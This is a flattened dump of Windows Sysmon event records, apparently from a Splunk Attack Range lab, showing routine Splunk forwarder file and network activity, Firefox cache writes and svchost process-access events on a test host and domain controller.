23542300x800000000000000021219164Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:35.569{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=425BA74B4228C6FE8C31C02930EE7C16,SHA256=4B2D30D4455A8AD7115AEDE82A55FA275690E05303126CED177F2E22D6DF21E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:35.339{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:35.338{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C89B3A0575F3891DA109C6276A71365,SHA256=E79AF8426D4B8FD5953D287A29E99D442762C01F27993D6DD49750BA9ADCBBCBfalsetrue 23542300x800000000000000021219163Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:35.132{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2BF6D0F69F7BB43A84392053972F356,SHA256=77B7B21ED70BCAE971FB68CD3549AF173FA6FAC5187A6F6FF2B31617661BCCEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219162Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:35.132{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C9E95545A6E516316C0B5612230BA73,SHA256=2875474717BAE482CE59F352768AC4B7993CECBF78F18344DD0310BB0F33E4B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219166Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:36.632{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC0823210E2577D30F86DA1991F53CF,SHA256=8DF73CF36E39A71AFD33DE58A79D2F893F3321361F642C255DEDF7679517C109,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:36.357{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:36.357{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0657B32B4C98A9D8FD1128CC64B03856,SHA256=26B5922167352ACC8954B5CDF7997E5CF3FAE4C55038E9AFBFAD60379612B1A1falsetrue 354300x800000000000000021219165Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:22.551{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64292-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:36.341{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-09-16 14:17:08.076 23542300x800000000000000057343854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:36.341{8B6011A9-BB8A-618B-4CA0-04000000F101}7452NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98Dfalsetrue 23542300x800000000000000021219167Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:37.694{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44293EA23D0E1B64534411E7C0396D12,SHA256=70034AFD12AA24A89D1995E586DBFFED4363EE9036221BA69CD33411E68DD736,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.371{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.371{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A6C84A400FB6E72B76DA1F8C1853831,SHA256=770E6DC6BE9B0E1EEF17233AB3263C10747BBA4396E84B12A66B20A9EE413502falsetrue 11241100x800000000000000057343861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD3AC4231DBA35EC82CD8E1356C4AF9F,SHA256=ADD62B792347D8AF85C019FD5F1E36B1BAC45E99B1EB606439FCA60A0B8075A1falsetrue 11241100x800000000000000057343859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:37.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5B0C869862CC32561AC94AF5C9256E2,SHA256=DB660A3E6AA8D3E0DF4A5029BCCC00889BAA227C20EB008168727E27B16C511Ffalsetrue 23542300x800000000000000021219168Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:38.726{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678BDB7BC010F782124BD2CC79E4213D,SHA256=6C2FDC0BB854CABD46466CC37BBF73C9542D1BD694D27CFB63192901F4019272,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:38.386{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:38.386{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950890A13E5FC1FFAD79813078DAF877,SHA256=9EFF8E19F111CEA459DB9D3BEC65163693DB54AD9E1D3ED7145DB1F88CC763FEfalsetrue 354300x800000000000000057343865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.670{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54497-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 354300x800000000000000057343864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:08.439{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54496-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219169Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:39.929{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98657D5B91E5A0FBDB72071837DB16A,SHA256=CD12CDBF908FA1B3861704EA0207DDA08140AB27B782810FEF1673B29FEC3C82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:39.416{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:39.416{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5913E396BDC859F0E81E9079A771D9DB,SHA256=00104EFE3F841A233375023A9638AFF1274B78CF6001E479D539EC414FDED167falsetrue 23542300x800000000000000021219170Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:40.929{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F016567EAD02D33887BF4193C47B6336,SHA256=20190D8C6E637BBE82FF0FDA0D641F10971658F9CDD3DC474288936F6F55143E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:40.417{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:40.417{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD8547CDFDB85FFB2E4B2D1C6B3E053,SHA256=3EDB2FCAC8972BBDEC0FD4BBEDE2A3F8EB03FCEB079B2A0BFFD36AF36AEF6C8Dfalsetrue 23542300x800000000000000021219173Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:41.929{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D45358B90AD175CEF2FDB834C00506,SHA256=6DCDB28F6192FFB53ED1F3C51D3C48F30A7753B5915AF1269197C95E124C093A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:41.420{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:41.420{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C7E559A7699C52636B4FD4D3B1A4A2,SHA256=981725DA04300C6B34054CC46ED2ABD022929EB3F755C8557185EA92F3FC1F0Ffalsetrue 23542300x800000000000000021219172Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:41.382{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C474F335592DF50730468A95FF3A8F29,SHA256=1C08889B4CD183EF8A377FE18357572CCF0E150801AFBD06047C6CCAA0237ADA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219171Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:41.382{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2BF6D0F69F7BB43A84392053972F356,SHA256=77B7B21ED70BCAE971FB68CD3549AF173FA6FAC5187A6F6FF2B31617661BCCEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219175Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:42.960{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F0C22848ED9E4FF81E52A60B9C3A3B,SHA256=E472C0191E8D93347A17592B1DA4B9EDA6D94B55459761E50F280A41F248EC3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.457{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.457{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E67F181A895227BEA96BDDC7E36E73,SHA256=5EE5213F7B42B0C06404F5D992EEC128823DE7A615F66672BAF8271DFABDF4D7falsetrue 354300x800000000000000021219174Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:28.582{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64293-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C1F5A7FB25F839419FCCEE2BCF9AF3,SHA256=E5BCBD9770C493618B088E343F243BFE1703311020D4F5D87282669DCF5A2081falsetrue 11241100x800000000000000057343875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:42.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD3AC4231DBA35EC82CD8E1356C4AF9F,SHA256=ADD62B792347D8AF85C019FD5F1E36B1BAC45E99B1EB606439FCA60A0B8075A1falsetrue 23542300x800000000000000021219176Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:43.960{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=936D5248CD07A0BD6EE68BE942184DDC,SHA256=FC6A7857CCCE25D5604F4B98C528D857D419950F3E0C3435CFF183582DF2E1D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:43.539{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:43.538{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C1F5A7FB25F839419FCCEE2BCF9AF3,SHA256=E5BCBD9770C493618B088E343F243BFE1703311020D4F5D87282669DCF5A2081falsetrue 11241100x800000000000000057343882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:43.472{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:43.472{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0427D36805B76F6D830E6E4F223EFCF8,SHA256=E20573552AD37158A16CF4DCB2B639CC0F736F51AD9059D282CE0B5B72F28BBAfalsetrue 354300x800000000000000057343880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:13.472{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54498-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219177Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:44.976{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA916D8919A36BCAD0A3DA7252567F8,SHA256=D6DC3933A54B71CF24791001357A2A55DAB4D81EF108265B5AB3A0CE58EBCCFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:44.488{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:44.488{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D41BC4E92A929DC8E7C7881843619B8,SHA256=4E99972F2897005A17B4612705CE35C7321D2A660BD903C7256F4D71B8508C34falsetrue 11241100x800000000000000057343886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:44.204{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\default\https+++vscode.dev\idb\2366965780vbsdc-obdeew-.sqlite-shm2021-11-12 12:14:44.204 11241100x800000000000000057343885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:44.204{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\default\https+++vscode.dev\idb\2366965780vbsdc-obdeew-.sqlite-wal2021-11-12 12:14:44.204 11241100x800000000000000057343890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:45.503{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:45.503{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A69B354C6826D87B7EB7A3EAC442200,SHA256=FE8A0BA010A97F5A634D02FA011E00B8B01CA4833A39B28FDE26E237E79FD668falsetrue 11241100x800000000000000057343892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:46.537{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:46.537{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A14AF2DA4937DDF958A128179FD08B,SHA256=E33E207B4CF05B8D5FC89D233637372986D459BC3068386309A149F528F9D2B0falsetrue 10341000x800000000000000021219181Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:46.694{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-0F00-00000000F101}964C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219180Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:46.694{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-0C00-00000000F101}732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 